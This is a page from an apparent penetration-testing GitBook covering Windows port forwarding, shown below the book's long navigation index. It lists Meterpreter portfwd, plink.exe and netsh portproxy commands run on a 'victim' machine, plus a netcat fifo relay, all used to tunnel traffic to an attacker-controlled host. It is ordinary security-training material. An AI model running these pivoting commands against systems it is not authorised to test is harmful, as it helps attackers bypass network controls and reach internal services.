๐Ÿฆน
CYBERSECURITY BOOK
  • ๐Ÿ‘ฝCS && PEN-TESTING BOOK
    • ๐Ÿ”Reconnaissance
      • ๐ŸˆดPassive Recon
        • M365/Azure Tenant Recon
          • MSFTRecon
        • ๐Ÿ•ต๏ธOSINT
          • Data Breach and Leaks Resources
          • OSINT Tools and Resources
          • Shodan
          • Creepy
          • The US Army manual ATP 2-22.9
          • NATO OSINT manual
          • Twitter Geolocation
          • Geotagging: GeoSocial Footprint
          • Bitcoin Address Lookup
          • Google Docs OSINT
          • Monitoring Tools
          • TOR Onion Links
          • Phone Numbers
          • Mitaka - In-Browser Tool
          • Russian Target
          • FTP Servers
          • War Related
        • ๐ŸŽŸ๏ธADINT
          • Surveillance
        • ๐Ÿ—บ๏ธGEOINT
          • Methodology
          • SunCalc - Geospatial OSINT using shadows
        • โ˜ข๏ธSIGINT
          • Methodology
          • Wifi
            • Kismet
        • โ›“๏ธDNS Recon and Route Mapping
        • ๐Ÿ‘จโ€๐Ÿ’ผObtain User Information
        • ๐Ÿ•ธ๏ธWeb Recon
        • ๐Ÿ•ท๏ธScraping Crypto Addresses
        • File Sharing Services
      • โ˜ข๏ธActive Recon
        • ๐ŸนStealth Scanning Strategies
        • ๐ŸญIdentify Network Infrastructure
        • ๐Ÿ’ปHost Enumeration
        • โ›ท๏ธSparta
        • ๐ŸงฉFuzzing
          • โ„๏ธWfuzz
          • Fuzzing Applications
          • Linux Kernel Fuzzing
          • Fuzzing Chrome V8 Engine
      • โ˜ฆ๏ธDoxing
        • Doxing Anyone
        • Gmail Address
      • ๐ŸŽฅSurveillance
        • Location Tracking Techniques
    • ๐Ÿ”ขEnumeration
      • ๐Ÿ”…Protocols and Ports
        • 21 - FTP
        • 22 - SSH
        • 23 - Telnet
        • 25, 465 - SMTP
        • 110, 143 - POP3, IMAP4
        • 1521 - Oracle DB Server
        • 3306 - Mysql
        • 2375 - Docker
        • 8080, 50000 - Jenkins
        • 80, 443 - HTTP, HTTPS
        • 3389 - RDP
        • 5900 - VNC
        • 445 - SMB
        • 161 UDP - SNMP
        • 11211 - Memcached
        • 2049 - NFS
      • ๐ŸงLinux - POST
      • ๐ŸชŸWindows - POST
      • ๐Ÿ•ธ๏ธWeb Apps
        • Directory Enumeration
        • Identify Virtual Websites
    • โ˜ฎ๏ธPublic Exploits
      • Look for Public Exploits
      • Metasploit
    • ๐Ÿ•ŽVulnerability Scanning
      • โš›๏ธNuclei
      • โ›ตTsunami Security Scanner
      • Hunting and Exploiting Vulnerable Windows Drivers
    • ๐Ÿ•ณ๏ธTunneling & Exfiltration
      • SSH Tunneling
      • ICMP Exfiltration
      • DNS Exfiltration
      • DNS Tunneling
      • TCP/UDP Tunneling
      • CloudFlare Tunnel
      • SOCKS
      • Ngrok - Port Forwarding
      • CURL - Exfiltration
      • Rclone - Data Exfiltration
      • Data Bouncing - External Data Exfiltration
    • Backdoors
      • Asymmetric Backdoor
    • ๐ŸŽฃPivoting (Post Exploitation)
      • Using Metasploit
      • SOCKS, SSH - Pivoting
      • Remote Port Forwarding
      • Tool - Chisel
      • Chisel - Double Pivoting
      • Bypassing Firewall with Forward Relays
      • Reverse Relays - Metasploit
      • Pivoting using Ligolo-Ng
    • ๐ŸŽฏActive Directory Pentesting
      • ๐Ÿ”‘Crendentials
        • Group Policy Preferences
        • LLMNR Poisoning
        • LDAP (Post)
        • Brute Force
        • LAPS Toolkit
        • PFX File
      • ๐Ÿ•โ€๐ŸฆบKerberos Attacks
        • ASREProast
        • Kerberoast
        • Pass the Certificate
      • ๐ŸAD Post Exploitation
        • Active Directory Post Exploitation
      • โ„น๏ธIntroduction to Identities
      • ๐Ÿ”งTesting Active Directory
      • ๐ŸŽ“Advanced Penetration Testing
      • ๐Ÿ”งAutomated Tools
        • ADCS Exploitation Tool
        • BadSuccessor โ€“ Full Active Directory Compromise
      • Hacking Active Directory Environment
        • ๐Ÿ•ต๏ธEnumeration
        • ๐ŸฆธExploitation
        • ๐ŸšชPrivilege Escalation
      • Windows and Active Directory Attacks
        • Shared Local Administrator Password
        • NTLM/SMB Relay
    • ๐ŸณDocker
      • Docker Container
      • Expose Docker Remotely
    • โ˜ธ๏ธKubernetes
      • Basic Commands
    • ๐Ÿ™…โ€โ™‚๏ธSocial Engineering
      • ๐Ÿ—บ๏ธLocation Phishing
      • ๐Ÿง˜โ€โ™‚๏ธ0-Click Email Attack
      • ๐ŸงBinary Linux Trojan
      • ๐Ÿ“งPhishing Mail
      • ๐Ÿ“Malicious File
      • โ™‰Malicious USB Drive
      • ๐Ÿ“ฉSpear-Phishing Methods (VIP)
      • ๐Ÿง‘โ€๐Ÿ’ผInsider Attack
      • Wifi Phishing - Wifiphisher
      • ๐Ÿ”MFA Bypass
      • Link Attacks
      • ๐Ÿ“‹Clipboard Hijacking (Post)
      • Copy-Paste Spoofing
    • ๐Ÿ—บ๏ธCEH Mindmaps
      • โ„น๏ธRecon and Information Gathering
        • Lab 1: Perform Footprinting Through Search Engines
          • Task 1: Gather Information using Advanced Google Hacking Techniques
          • Task 2: Gather Information from Video Search Engines
          • Task 3: Gather Information from FTP Search Engines
          • Task 4: Gather Information from IoT Search Engines
        • Lab 2: Perform Footprinting Through Web Services
          • Task 1: Find the Company's Domains and Sub-domains using Netcraft
          • Task 2: Gather Personal Information using PeekYou Online People Search Service
          • Task 3: Gather an Email List using theHarvester
          • Task 4: Gather Information using Deep and Dark Web Searching
          • Task 5: Determine Target OS Through Passive Footprinting
        • Lab 3: Perform Footprinting Through Social Networking Sites
          • Task 1: Gather Employee's Information from LinkedIn using theHarvester
          • Task 2: Gather Personal Information from Various Social Networking Sites using Sherlock
          • Task3: Gather Information using Followerwonk
        • Lab 4: Perform Website Footprinting
          • Task 1: Gather Information About a Target Website using Ping Command Line Utility
          • Task 2: Gather Information About a Target Website using Photon
          • Task 3: Gather Information About a Target Website using Central Ops
          • Task 4: Extract a Company's Data using Web Data Extractor
          • Task 5: Mirror a Target Website using HTTrack Web Site Copier
          • Task 6: Gather Information About a Target Website using GRecon
          • Task 7: Gather a Wordlist from the Target Website using CeWL
        • Lab 5: Perform Email Footprinting
          • Task 1: Gather Information about a Target by Tracing Emails using eMailTrackerPro
        • Lab 6: Perform Whois Footprinting
          • Task 1: Perform Whois Lookup using DomainTools
        • Lab 7: Perform DNS Footprinting
          • Task 1: Gather DNS Information using nslookup Command Line Utility and Online
          • Task 2: Perform Reverse DNS Lookup using Reverse IP Domain Check and DNSRecon
          • Task 3: Gather Information of Subdomain and DNS Records using SecurityTrails
        • Lab 8: Perform Network Footprinting
          • Task 1: Locate Network Range
          • Task 2: Perform Network Tracerouting in Windows and Linux Machines
          • Task 3: Perform Advanced Network Route Tracing Using Path Analyzer Pro
        • Lab 9: Perform Footprinting using Various Footprinting Tools
          • Task 1: Footprinting a Target using Recon-ng
          • Task 2: Footprinting a Target using Maltego
          • Task 3: Footprinting a Target using OSRFramework
          • Task 4: Footprinting a Target using FOCA
          • Task 5: Footprinting a Target using BillCipher
          • Task 6: Footprint a Target using OSNIT Framework
      • ๐Ÿ”„Network Scanning
        • Tasks
      • ๐Ÿ”ขEnumeration
        • Tasks
      • ๐Ÿ‘จโ€๐Ÿ”งVulnerability Analysis
        • Tasks
      • ๐ŸฆธSystem Hacking
        • Tasks
      • *๏ธMalware Analysis
        • Tasks
      • โ„๏ธSniffing
        • Tasks
      • ๐Ÿง‘โ€๐Ÿคโ€๐Ÿง‘Social Engineering
        • Tasks
      • ๐ŸšซDenial of Service
        • Tasks
      • ๐Ÿ›ฉ๏ธSession Hijacking
        • Tasks
      • ๐Ÿ†”Evading IDS, Firewalls, and Honeypots
        • Tasks
      • ๐Ÿ–ฅ๏ธWeb Server Hacking
        • Tasks
      • ๐Ÿ•ธ๏ธWeb Application Hacking
        • Tasks
      • ๐Ÿ’‰SQL Injection
        • Tasks
      • ๐Ÿ‘๏ธโ€๐Ÿ—จ๏ธWireless Network Hacking
        • Tasks
      • ๐Ÿ“ฑMobile Hacking
        • Tasks
      • ๐Ÿ‘จโ€๐Ÿ”ฌIoT and OT Hacking
        • Tasks
      • โ˜๏ธCloud Computing
        • Tasks
      • ๐Ÿ”Cryptography
        • Tasks
    • ๐Ÿ—พCND Mindmaps
    • ๐Ÿ‘ฟVulnerability Research
      • ๐Ÿ‘จโ€๐Ÿ’ปCode Review
    • ๐Ÿ“ถNetwork Security
      • ๐ŸฆInstalling and Configuring Network Based IDS In Ubuntu: Suricata
      • ๐Ÿ›๏ธOpenSSL
      • ๐Ÿ‘ฉโ€๐Ÿš’Active Directory
        • LAPS
    • ๐Ÿ›‚Port Forwarding
      • ๐ŸงLinux
      • ๐ŸชŸWindows
      • ๐Ÿ”„Router
    • ๐Ÿ‘พAPI Testing
      • Reverse Engineering
        • Reverse Engineer an API using MITMWEB and POSTMAN
      • API Hacking Basics
        • Practicals
      • ๐Ÿ•ต๏ธโ€โ™‚๏ธAPI Recon
      • ๐Ÿ“„API Documentation
        • โš—๏ธLab: Exploiting an API endpoint using documentation
      • ๐Ÿ‘จโ€๐ŸŽคIdentifying and Interacting with API Endpoint
        • โš—๏ธLab: Finding and exploiting an unused API endpoint
      • ๐ŸฆฎFinding Hidden Parameters
      • ๐ŸทMass assignment vulnerabilities
        • โš—๏ธLab: Exploiting a mass assignment vulnerability
      • โœ…Preventing vulnerabilities in APIs
      • ๐Ÿ˜ทServer-side parameter pollution
      • ๐Ÿ•ต๏ธโ€โ™‚๏ธTesting for server-side parameter pollution in the query string
        • โš—๏ธLab: Exploiting server-side parameter pollution in a query string
      • ๐Ÿ›ฃ๏ธTesting for server-side parameter pollution in REST paths
      • ๐ŸšงTesting for server-side parameter pollution in structured data formats
        • โš—๏ธLab: Exploiting server-side parameter pollution in a REST URL
      • ๐Ÿ‘จโ€๐Ÿš€Testing with automated tools
      • ๐ŸšจPreventing server-side parameter pollution
    • ๐Ÿ•ธ๏ธWeb App Pentesting Notes
      • ๐ŸงฐWeb App Pentesting Tools
        • Fuzzing: ffuf Tool
        • Nosql Injection: NoSqlMap
        • Kiterunner
        • Burp Suite
      • โŒXSS and XSRF Together
      • ๐Ÿ’‰NoSQL Injection
        • NoSQL Databases
        • NoSQL syntax injection
        • NoSQL operator injection
        • Exploit Syntax Injection to Extract Data
        • Exploiting NoSQL operator injection to extract data
        • Timing based injection
        • Preventing NoSQL injection
      • ๐Ÿง™Cross Site Request Forgery
      • ๐Ÿ“ผHidden Parameter Discovery
      • ๐Ÿ“ŒSSTI : Server Side Template Injection
        • Lab: Basic server-side template injection
        • Lab: Basic server-side template injection (code context)
        • Lab: Server-side template injection using documentation
        • Lab: Server-side template injection in an unknown language with a documented exploit
        • Lab: Server-side template injection with information disclosure via user-supplied objects
      • ๐Ÿ’ŽJWT Attack
        • Exploiting flawed JWT signature verification
        • Brute-forcing secret keys
        • JWT header parameter injections
        • Prevent JWT attacks
      • ๐Ÿ“ŠGraphQL API Vulnerabilities
        • Exploiting Unsanitized Arguments
        • Discovering Schema Information
          • Lab: Accessing private GraphQL posts
          • Lab: Accidental exposure of private GraphQL fields
        • Bypassing GraphQL introspection defenses
          • Lab: Finding a hidden GraphQL endpoint
        • Bypassing rate limiting using aliases
          • Lab: Bypassing GraphQL brute force protections
        • GraphQL CSRF
          • Lab: Performing CSRF exploits over GraphQL
      • ๐Ÿ”Authentication Vulnerabilities
      • ๐Ÿ‡Race Conditions
        • Limit overrun race conditions
        • Multi Endpoint Race Conditions
        • Single Endpoint Race Conditions
        • Time Sensitive Attacks
      • ๐Ÿง LLM Attacks
        • Exploiting LLM APIs, functions, and plugins
        • Indirect Prompt Injection
      • โ˜ธ๏ธHost Header Attacks
        • Testing for Vulnerability
        • Password Reset Poisoning
        • Web Cache Poisoning
        • Accessing Restricted Functionality
    • ๐Ÿ›ฉ๏ธWireless Hacking
      • Zigbee Attacks
      • Wifi Attacks
        • Hack WPA2 Networks
        • Automated: Wifite
      • Bluetooth Attacks
        • BlueDucky Script
      • RFID Attacks
    • ๐ŸCEH Engage Walkthroughs
      • 1๏ธโƒฃCEH Engage Part 1
      • 2๏ธโƒฃCEH Engage Part 2
      • 3๏ธโƒฃCEH Engage Part 3
      • 4๏ธโƒฃCEH Engage Part 4
    • ๐ŸŽƒEvasion
      • OWASP-ZSC
      • AMSI Bypass
      • Windows Evasion
      • Windows Defender Application Control (WDAC): Killing EDR
      • InvisibilityCloak - C# Obfuscation Toolkit
    • ๐ŸšชPost exploitation
      • ๐Ÿ›ฌLiving Off The Land Tools
      • ๐ŸฅMimikatz
      • ๐ŸงPrivilege escalation: Linux
      • ๐ŸชŸPrivilege escalation: Windows
      • ๐Ÿ‘พPAC Tempering
      • Amnesiac - EDR Bypass
      • GraphRunner: A Post-Exploitation Toolset for Microsoft 365
    • ๐Ÿ”“Hashing & Password Cracking
      • Hashing
      • Custom Wordlist
      • Hydra
      • John
      • Windows - Local Password Cracking
      • Password Cracking using Rules
    • ๐Ÿ“’Hacking Cheat Sheets
      • ๐Ÿ”Recon Cheatsheet
      • ๐Ÿ”ขEnumeration Cheatsheet
      • ๐ŸšShells and Reverse Shells Cheat Sheet
      • ๐ŸฎMeterpreter Cheat Sheet
      • โ˜„๏ธPowershell Commands Cheat Sheet
      • ๐Ÿ’‰Command Injection Cheat Sheet
      • ๐ŸชกSQL Injection Cheat Sheet
      • ๐ŸฎMetasploit Cheat Sheet
      • ๐ŸงฐEthical Hacking Tools
      • ๐ŸงLinux Hacking Basics
      • ๐Ÿ”บMSFVenom
    • ๐Ÿ‡CEH Practical
      • CEH Practical Tools
      • ๐Ÿ”Network Scanning
      • ๐Ÿ•โ€๐ŸฆบService Enumeration
      • ๐Ÿ–Š๏ธStegnography
      • ๐Ÿ”“Cryptography
      • ๐Ÿ•ธ๏ธWeb and Android Hacking
      • ๐ŸšชPrivilege Escalation
      • ๐Ÿฆ„Malware Threats
    • โ˜๏ธCloud Pentesting
      • โœ๏ธAWS Pentesting
        • ๐ŸŒ†AWS Environments
          • Identity and Access Management
          • Identity Based Policies
          • Resource Based Policy
          • Untitled
        • ๐ŸงฐTools
          • AWS CLI
          • Pacu
          • Prowler
          • Cloudsplaining
        • Attacks & Methodology
          • ๐Ÿ‘จโ€๐Ÿ”ฌExploiting AWS Misconfigurations
          • AWS Pentest Methodology
        • Initial Access
          • Public Access
          • Leaked Secrets
          • Phishing
          • Resource Exploitation
        • Post-Compromise Recon
          • AWS Command Line
          • Resource Enumeration
          • IAM Policy Enumeration
          • Identifying Public Resources
        • S3 Buckets
          • S3 Bucket Misconfiguration
      • ๐Ÿ…ฐ๏ธAzure Pentesting
        • Azure Attack Matrix
        • Stealing Access Tokens
        • Lateral Movement - Skeleton Key Attack
    • ๐ŸชŸWindows Security
      • ๐Ÿ•ต๏ธโ€โ™‚๏ธRecon
        • Host Discovery
        • SMB
        • MSSQL
        • IIS
      • ๐ŸฆนExploitation
        • CMD Commands
      • ๐ŸšชPost Exploitation
        • Dump Password Hashes
        • Mimikatz
      • ๐Ÿฆ•Persistence (Post)
        • User Accounts, Hash Cracking, RID Hijacking
        • Backdoors
        • Services
        • Scheduled Tasks
        • Windows Startup
    • ๐ŸงLinux Security
      • ๐Ÿ‹๏ธโ€โ™‚๏ธPrivilege Escalation
        • 1๏ธโƒฃ1โƒฃ 1โƒฃ Exploiting Setuid Programs
        • 2๏ธโƒฃ2โƒฃ 2โƒฃ Cron Jobs
        • 3๏ธโƒฃ3โƒฃ 3โƒฃ Permissions
        • 4๏ธโƒฃ4โƒฃ 4โƒฃ Logs
        • 5๏ธโƒฃ5โƒฃ 5โƒฃ Restricted Shell
      • Persistence
        • D3m0n1z3dShell
    • ๐ŸŽMacOS Security
      • Endpoint Security
        • eslogger
      • Gaining Access
        • Setup and weaponize Mythic C2 using DarwinOps to target MacOS
    • ๐Ÿ“ฑAndroid Security
      • Android Pentesting Notes
      • Android Application Pentesting Part 1
        • Static Analysis
        • Dynamic Analysis
      • Android Application Pentesting Part 2
        • Aspects of Android Security
        • Static Application Testing
        • Dynamic Application Testing - Part 1
        • Platform Interaction Testing
        • Dynamic Application Testing - Part 2
        • OWASP Top 10
      • Mobile Application Pentesting Part 3
        • Mobile Security Controls
        • Dynamic Analysis
        • Static Code Analysis
        • Insecure Data Storage
        • Runtime Security
    • ๐ŸŽiOS Security
      • iOS Application Analysis
    • ๐ŸงพScripting
      • ๐Ÿ’ŽRuby
        • Basics
        • Object Types
      • ๐ŸPython
        • Web Scrapping Scripts
      • ๐ŸงBash
      • ๐ŸชPerl
      • ๐Ÿ˜PHP
    • ๐Ÿ‰Reverse Engineering & Malware Analysis
      • RE Preparation
        • RE Process
        • Malware Analysis Tools
        • Malware Components: Windows
      • Shellcode Analysis
        • Automated Extraction
      • 1๏ธโƒฃDisassembly and Disassembler
      • 2๏ธโƒฃBinary Analysis
      • ๐ŸงLinux ELF Format
      • โ™ŽYara Guide
      • ๐Ÿ“ฑAndroid Reverse Engineering
        • Spyware Reverse Engineering
      • ๐Ÿ“ฒMobile Applications
        • Flutter Mobile Apps
    • ๐ŸŒ Protocol Exploitation
      • ARP
      • DNS
      • VoIP
    • ๐Ÿ›œNetwork Pentesting
      • SNMP - Authentification
    • ๐Ÿ‘ฎDigital Forensics & Incident Response
      • ๐Ÿ“ฉEmail Forensics
        • Callback Phishing
        • Business Email Compromise Investigations
          • Investigating using Hawk
          • Microsoft Defender Explorer
      • ๐Ÿ’ธRansomware Forensics
        • Decrypting Intermittent Encryption
      • ๐Ÿ’ฑBlockchain Forensics
        • ๐ŸพFrontrunning/Sandwich Bot Finder
      • ๐Ÿ“Memory Forensics
        • Process
        • Memory Analysis - Volatility3
      • โ˜„๏ธNetwork Forensics
        • Pcap Analysis
      • ๐ŸชŸWindows Forensics
        • NTDS Secret Extraction
        • Detecting Hidden Processes
        • Analyzing Prefetch Files
        • Windows MFT Parsing
        • USN Journal Forensics
      • ๐Ÿ“ผMedia Forensics
        • Rubber Ducky Analysis
        • RDP Bitmap Cache
        • USB Event Tracking
      • ๐Ÿง™Forensic Imaging
        • Image Analysis: Autopsy
      • ๐Ÿช…Data Collection
        • ๐ŸชŸWindows
        • ๐ŸงUnix/Linux
      • ๐Ÿ”Privacy Research
        • Deanonymization - TOR Hidden Services
        • Deanonymization - Flash Code
        • Dark Web - OSINT
        • Dark Web Investigation
      • ๐Ÿ•ธ๏ธWeb Investigations
        • Investigating Favicon Hashes
      • ๐Ÿดโ€โ˜ ๏ธThreat Detection
        • Reading Clipboard Data via Powershell
        • Detection of Windows Defender Tampering via Powershell
        • Detection of Remote Template Injection
    • ๐Ÿฆ‹Cisco Attacks
      • Decrypting Type 5 Cisco Passwords
    • ๐ŸผCVE's
      • libssh 0.8.1 - CVE 2018-10933
      • proftpd-1.3.3c-backdoor
      • zerologon - CVE-2020-1472
      • Apache Ghostcat - CVE 2020-1938
      • Spring Authorization Bypass - CVE 2024-38821
      • Apache Solr - CVE-2024-45216
      • Bypassing Mark of the Web with 7zip CVE-2025-0411
      • CVE-2025-24054, NTLM Exploit in the Wild
    • ๐Ÿ›OWASP TOP 10
      • LLM
        • OWASP Top 10 for LLM Applications
      • Machine Learning
        • OWASP Machine Learning Security Top Ten
      • ๐Ÿ•ธ๏ธWEB
        • 1๏ธโƒฃA01:2021 โ€“ Broken Access Control
        • 2๏ธโƒฃA02:2021 โ€“ Cryptographic Failures
        • 3๏ธโƒฃA03:2021 โ€“ Injection
        • 4๏ธโƒฃA04:2021 โ€“ Insecure Design
        • 5๏ธโƒฃA05:2021 โ€“ Security Misconfiguration
        • 6๏ธโƒฃA06:2021 โ€“ Vulnerable and Outdated Components
        • 7๏ธโƒฃA07:2021 โ€“ Identification and Authentication Failures
        • 8๏ธโƒฃA08:2021 โ€“ Software and Data Integrity Failures
        • 9๏ธโƒฃA09:2021 โ€“ Security Logging and Monitoring Failures
        • ๐Ÿ”ŸA10:2021 โ€“ Server-Side Request Forgery (SSRF)
      • ๐Ÿฆ„API
      • ๐ŸŒ†IoT
      • ๐Ÿ“ฑMOBILE
    • ๐Ÿ›ผWeb 3 Vulnerabilities
      • Fuzzing Ethereum Smart Contract
      • Static Analysis using Slither
      • Solidity Audit using Mythril
      • ๐ŸŽ†Reentrancy Vulnerabilities
      • ๐ŸฅชSandwich Attacks
      • ๐ŸŒ‡Integer Attacks
      • ๐Ÿš‚Authorization Issues
      • ๐ŸŒ‰Bad Randomness
    • ๐Ÿ›ฉ๏ธWeb 3 Smart Contract
      • โ›ŽBlockchain Hacking (Python)
        • ๐ŸŒ†Smart Contract Template
        • ๐ŸŽ†Interact with ERC20 Tokens
        • ๐Ÿ“ฒInteract with Wallets
        • ๐ŸทReverse Engineering Bytecode
        • โœ’๏ธSign Transactions
        • ๐ŸชขSmart Contract Interactions
        • ๐Ÿงœโ€โ™€๏ธSubscribing to Events
        • ๐ŸŸคBrownie Interactions
        • ๐Ÿ‘พExploit PoC
    • ๐ŸŒƒSmart Contract Audits
      • ๐ŸธThunder Loan Audit
        • 1๏ธโƒฃInitial Review
    • ๐Ÿ‘ฉโ€๐Ÿ’ผGRC Frameworks
      • NIST 800-39
      • SOC 2
      • HIPAA
      • PCI-DSS
      • NIST CSF
      • FedRAMP
      • CSA STAR
      • SOX
      • GDPR
      • ISO 27001
  • ๐ŸฆนREAL WORLD && CTF
    • โš›๏ธScripts and Systems
      • R: Code Execution
      • Python2 Input Vulnerability
  • ๐ŸฆธMISCELLANEOUS
    • Decrypt SSL Traffic
    • ๐ŸฆOpenSSL Commands
    • ๐Ÿ”’GPG
    • ๐Ÿ”SSH Commands
    • OWASP BWAPP Setup
    • Commando VM Setup
    • Living Off The Land Applications
    • ๐ŸงDevelop Your Own Linux Distro
    • ๐ŸฑGitHub Commands
      • ๐Ÿ“”Cheatsheet
  • ๐Ÿง›โ€โ™‚๏ธADVANCED PERSISTENT THREATS - RESEARCH
    • Reconnaissance
    • Resource Development
    • Initial Compromise
    • Execution
    • Establish persistence
    • Escalate privileges
    • Defense Evasion
    • Credential Access
    • Discovery
    • Lateral movement
    • Collection
    • Command and Control
    • Data exfiltration
    • Impact
  • ๐Ÿ‘พTHREAT HUNTING - RESEARCH
    • MacOS
    • Azure Sentinel
    • Network Data
      • Network Data Sources
      • Network Threat Hunting Too
      • Hunting the Undetected
      • Protocols
      • Network Threat Hunts
    • Active Directory
      • Introduction
      • Threat Hunting
      • Threat Hunting in Active Directory
    • Data Collection
      • Internal Data
      • External Data
        • Private Data Sources
        • Community Data Sources
        • Public Data Sources
      • OSINT
    • Data Management and Processing
      • Data Processing
      • Common CTI Standards
      • Storage and Integration
      • Threat Intelligence Platforms
    • Analysis
      • Introduction
      • Analysis of Competing Hypothesis
      • Cyber Kill Chain and Diamond Model
      • Cyber Kill Chain and Courses of Action
    • Campaign Analysis
      • Introduction
      • Heatmap Analysis
      • Visual Analysis
      • MITRE Threat Group Tracker
      • Threat Intelligence Naming Conventions
    • Attribution
      • Introduction
      • Cognitive Biases
      • Logical Fallacies
      • Manage Biases
      • Nation-State Attribution
    • Dissemination and Sharing
      • Introduction
      • Tactical Intelligence
      • Operational Intelligence
      • Strategic Intelligence
  • ๐Ÿฆ…CISA - INCIDENT RESPONSE PLAYBOOK
    • Overview
Powered by GitBook
On this page
  • Metasploit
  • Plink.exe
  • NETSH

Was this helpful?

Edit on GitHub
  1. CS && PEN-TESTING BOOK
  2. Port Forwarding

Windows

Metasploit

meterpreter> portfwd add -l 8080 -p 80 -r 172.16.185.132

Plink.exe

It is a Microsoft tool that performs the functions that SSH would perform on a UNIX system. It is an old tool but since it is a static binary we can pass it from our team to execute it on the victim.

We must raise the ssh server on our computer, I in this case create a user to not reveal the credentials.

Now on the victim machine we will use plink in remote port forwarding mode, the syntax is similar to that of the ssh.

plink.exe -ssh test@172.16.75.1 -R 8080:localhost:80

NETSH

In this case we will use a microsoft tool that is found by default so if you can not upload files it will be a good option. In despite of this we must be administrator.

In the victimโ€™s machine we will have to execute this command that will have a proxy port that will forward the port traffic of the address that we indicate in the connect address and connect port.

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=127.0.0.1

In our machine we will have to connect in the same way as in some previous ones.

rm -f fifo;mkfifo fifo;nc -v -lk -p 8080 <fifo | nc 192.168.1.38 8080 >fifo
PreviousLinuxNextRouter

Last updated 1 year ago

Was this helpful?

๐Ÿ‘ฝ
๐Ÿ›‚
๐ŸชŸ